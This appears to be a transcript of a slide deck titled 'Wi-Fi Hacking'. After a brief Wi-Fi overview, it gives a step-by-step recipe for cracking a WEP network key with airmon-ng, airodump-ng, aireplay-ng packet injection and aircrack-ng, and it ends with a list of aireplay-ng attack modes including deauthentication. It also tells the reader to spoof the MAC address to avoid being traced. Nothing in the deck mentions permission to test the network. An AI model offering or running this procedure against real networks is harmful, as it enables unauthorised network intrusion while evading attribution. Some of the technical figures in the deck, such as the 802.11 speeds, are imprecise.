Published on June 26, 2020
1. SKYNET SECURE SOLUTIONS NOTES FOR Wi-Fi Hacking By Kashif Memon
2. WHAT is Wi-Fi? Stands for Wireless Fidelity Uses 2.4 – 5 GHz Band in the frequency spectrum Allows data to be exchanged WIRELESSLY Uses Radio Waves Defined as “WLAN products that are based on the IEEE 802.11 standards” In 2004, Mysore became India's first Wi-fi-enabled city and second in the world after Jerusalem.
3. Advantages Cheaper Less complexity (mainly caused due to wires) Fast Connectivity Secure with new WPA2 method
4. Disadvantages Require a Wi-Fi adapter (Obviously) Slower data transfer when the range is low Obstructions may cause disconnections WEP pass code is easily CRACKABLE. !
5. Wi-Fi is called as “802.11 Standard” Flavors of 802.11 : 802.11a operates on the 5GHz spectrum providing a speed of 20 Mbps 802.11b operates on the 2.4GHz spectrum providing a speed of 11.4 Mbps 802.11g operates on the 2.4GHz spectrum providing blazingly fast speeds 802.11n is a new technology
6. Do YoU KnOw !? Prerequisites: 1. Compatible wireless adapter 2. Backtrack 3 over advanced (USB boot or Llive CD) 3. WEP Enabled WiFi network 4. Knowledge on Channel, BSSID, ESSID, Mac ID
7. LeTs GeT cRaCkInG! 1. To crack the WEP key, first boot into Backtrack and use the Text Mode or Default Mode, Load the GUI using “startx” 2. One imp. thing is to know adapter your laptop has whether or not it has the capability to inject payloads or not. So we use airmon-ng to list all the interfaces
8. KeEp It CoMiNg … 3. Now first we stop the interface we want to use using airmon-ng stop (intf). 4. To CONFIRM, the interface is down, use ifconfig (intf) down. 5. Now prevent being tracked back, we fake our Mac ID using macchanger --mac (hex)(intf)
9. FaStEr NoW … C’mOn 6. Now we finally start the interface using airmon- ng start (intf) 7. Now its time to find the network and exploit it so use airodump-ng (intf) to find the BSSID of the network - Basic Service Set Identifier and Channel 8. Now with the following cmd, we try to capture the traffic on the network and using that traffic to crack the WEP key airodump-ng (intf) -c (ch) -w (intf) --bssid (bssid)
10. YoUr NeArLy DoNe ! 9. [In a NEW CONSOLE] Here we try to virtually increase the traffic by sending garbage data over the network and forcing the router to reply and with the help of that, we try to break the WEP key aireplay-ng -1 0 -a (bssid) -h (mac) -e (essid) (intf) and then aireplay-ng -3 -b (bssid) -h (mac) (intf) 10. Now wait patiently till the #Data goes above 10K ( Recommended)
11. SuCcEsSfUl??! 11. Use ls to list the files on the desktop which are actually the files where the traffic is being logged 12. Now finally use aircrack to use the IV’s to crack the WEP using aircrack-ng -b (bssid) Wifi-01.cap Now to understand the commands here is the extra information -> Next Slide :D
12. Filter options: Attack Modes: -b bssid : MAC address, Access Point -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length -n len : maximum packet length -u type : frame control, type field -v subt : frame control, subtype field -t tods : frame control, To DS bit -f fromds : frame control, From DS bit -w iswep : frame control, WEP bit -deauthenticate 1 or all stations (-0) -fake authentication with AP (- 1) -interactive frame selection (-2) -standard ARP-request replay (-3) -decrypt/chopchop WEP packet (-4) -generates valid keystream (-5) -injection test (-9) aireplay-ng <options> <replay interface>